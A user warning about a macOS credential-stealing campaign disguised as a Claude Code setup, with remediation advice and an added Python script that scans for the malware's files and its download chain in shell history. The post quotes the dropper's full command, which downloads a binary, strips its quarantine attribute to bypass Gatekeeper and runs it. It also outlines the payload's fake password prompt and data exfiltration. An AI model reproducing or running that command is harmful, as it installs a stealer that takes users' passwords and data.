It is an extremely obfuscated (and clearly malicious) shell command that ultimately downloads and executes a binary payload with the name helper, bypassing Gatekeeper. The final stage of the dropper is this:
curl -o /tmp/helper https://rvdownloads.com/usbfix/replace && xattr -c /tmp/helper && chmod +x /tmp/helper && /tmp/helper
Two of the AV engines on the VirusTotal website flag the payload as a credential stealer:
Avast MacOS:Stealer-HH
ESET-NOD32 OSX/PSW.Agent.GR Trojan
For more information, see:
Malware campaign impersonating Claude Code setup via Google (github.com).
The linked page describes what appears to be a slightly different variant:
The decrypted payload executes two osascript processes that:
- Request TCC AppleEvents permission for Terminal
- Browse /Applications/ via Finder (fndr,gstl) for reconnaissance
- Hide the Terminal window (core,setd → Terminal)
- Gather system info via multiple do shell script calls
- Write a machine fingerprint hash to ~/.username
- Display a fake password dialog (syso,dlog) to social-engineer the user's macOS password
- Write the captured password to ~/.move
- Create temporary staging files, read system data
- Exfiltrate collected data via curl again to woupp.com
- Clean up temporary files
You must assume that all your personal data is compromised.
The one mitigating feature of this malware, at least in the variant analyzed by Anthropic on GitHub, is that it has no persistence mechanism. It is apparently downloaded and executed once. But I am not a security researcher and I did not disassemble the payload or run it to see what it does. At a minimum, you should open System Settings > General > Login Items & Extensions and make sure there is nothing there that you do not recognize, even if it looks harmless. If there is, please report it here.
Waste no time changing all important passwords. Take whatever precautions you deem necessary against identity theft. Expect follow-on attacks attempting to defeat two-factor authentication.
For the form these follow-on attacks may take, see:
How Attackers Bypass Two-factor Authentication (2FA) (zitadel.com).
Even if the attacker has already obtained your user credentials, they still need to acquire the additional authentication factor to gain access to your account. To obtain the required code from the victim, the criminal might call, text, or email them with a seemingly plausible justification. Of course, they will likely do so disguised as a trusted entity, such as Google or Apple, to minimize suspicion. Make sure to always double-check the sender's identity, as well as the content of the text message, to avoid falling victim to a hacking attempt.
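The following is an added example, not code from the original post or from the GitHub analysis it links to. It checks a Mac for the file artifacts the post names (/tmp/helper, ~/.username, ~/.move), scans shell history for the dropper's final stage (a curl download, `xattr -c` to strip the quarantine attribute that Gatekeeper relies on, `chmod +x`, then execution of the same file), and lists per-user LaunchAgents plists for manual review alongside the Login Items check the post recommends. The function names, the history regex and the sample history lines are this example's own constructions; the LaunchAgents listing goes slightly beyond the post, which found no persistence in the analyzed variant.

```python
#!/usr/bin/env python3
"""Added example: check a Mac for the artifacts described in the post.

Indicators taken from the post: /tmp/helper (downloaded payload),
~/.username (machine fingerprint hash), ~/.move (captured password).
Function names, the regex and sample data below are constructed for this
example and are not from the original analysis.
"""
import re
from pathlib import Path

# File artifacts named in the post. Paths are resolved against the home
# and tmp directories passed in, so the checks can run against a test
# directory as well as the live system.
HOME_ARTIFACTS = (".username", ".move")
TMP_ARTIFACTS = ("helper",)

# Dropper chain from the post: curl -o FILE URL, xattr -c FILE (clears
# com.apple.quarantine, so Gatekeeper never inspects the binary),
# chmod +x FILE, then FILE is executed. The backreference \1 ties all
# four steps to the same path. Constructed pattern.
DROPPER_RE = re.compile(
    r"curl\s+-o\s+(\S+)\s+\S+"        # download to a path, capture it
    r".*xattr\s+-c\s+\1"              # strip extended attributes from it
    r".*chmod\s+\+x\s+\1"             # make it executable
    r".*[;&|\s]\1(?:\s|$)"            # run it
)


def scan_artifacts(home: Path, tmp: Path) -> list[str]:
    """Return the artifact paths from the post that exist on disk."""
    found = []
    for name in HOME_ARTIFACTS:
        path = home / name
        if path.exists():
            found.append(str(path))
    for name in TMP_ARTIFACTS:
        path = tmp / name
        if path.exists():
            found.append(str(path))
    return found


def dropper_lines(history_lines) -> list[str]:
    """Return shell-history lines matching the download/unquarantine/run chain."""
    return [line for line in history_lines if DROPPER_RE.search(line)]


def launch_agents(home: Path) -> list[str]:
    """List per-user LaunchAgents plists for manual review.

    The variant analyzed in the post had no persistence mechanism; this
    simply surfaces what is there so the user can recognize each entry.
    """
    agents_dir = home / "Library" / "LaunchAgents"
    if not agents_dir.is_dir():
        return []
    return sorted(str(p) for p in agents_dir.glob("*.plist"))


if __name__ == "__main__":
    home = Path.home()
    print("artifacts present:", scan_artifacts(home, Path("/tmp")) or "none")
    for hist_name in (".zsh_history", ".bash_history"):
        hist_path = home / hist_name
        if hist_path.exists():
            lines = hist_path.read_text(errors="replace").splitlines()
            print(hist_name, "dropper chains:", dropper_lines(lines) or "none")
    print("LaunchAgents to review:", launch_agents(home) or "none")
```

If any artifact is present or a dropper chain appears in history, treat the machine as compromised exactly as the post says: change passwords from a clean device and expect follow-on 2FA attempts. Absence of these artifacts is not proof of safety, since the post notes the payload cleans up temporary files and other variants may differ.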
